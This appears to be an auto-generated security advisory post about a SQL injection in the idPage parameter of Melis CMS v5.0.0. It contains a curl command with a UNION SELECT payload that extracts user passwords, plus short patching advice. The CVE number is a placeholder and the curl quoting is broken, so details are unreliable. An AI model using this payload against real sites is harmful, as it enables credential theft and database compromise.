Listen to this Post
The CVE-2024-XXXX vulnerability in the Melis Platform CMS is a classic SQL injection flaw located within the `getTinyTemplates` endpoint of the `MelisCms/PageEdition` controller. The vulnerability arises because the `idPage` parameter, received from a user-controlled HTTP request, is directly concatenated into an SQL query string without proper sanitization or the use of prepared statements. When a malicious actor sends a crafted request containing SQL meta-characters (like a single quote ') and additional SQL commands (such as UNION SELECT, OR 1=1--, or ; DROP TABLE...) within the `idPage` parameter, the backend database interprets and executes these commands as part of the legitimate query. This allows the attacker to bypass authentication, extract sensitive information from the database (like administrator credentials or user data), modify existing data, create new administrative users, or even delete entire database tables, leading to a complete compromise of the CMS and its underlying data.
Platform: Melis CMS
Version: v5.0.0
Vulnerability : SQL Injection
Severity: Critical
date: 2024-10-08
Prediction: 2024-10-29
What Undercode Say:
curl -X POST 'http://<target>/melis/MelisCms/PageEdition/getTinyTemplates' -d 'idPage=1'"' UNION SELECT 1,user_pass,3,4 FROM melis_cms_user-- -"
SELECT FROM melis_cms_tiny_templates WHERE template_page_id = '1' UNION SELECT 1,user_pass,3,4 FROM melis_cms_user-- -'
How Exploit:
Craft malicious HTTP POST requests to the vulnerable endpoint with SQL payloads in the `idPage` parameter to extract database information, user credentials, or manipulate data.
Protection from this CVE:
Apply vendor patch. Use parameterized queries. Implement input validation. Deploy a WAF.
Impact:
Full database compromise. Data exfiltration. Unauthorized access. Data manipulation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
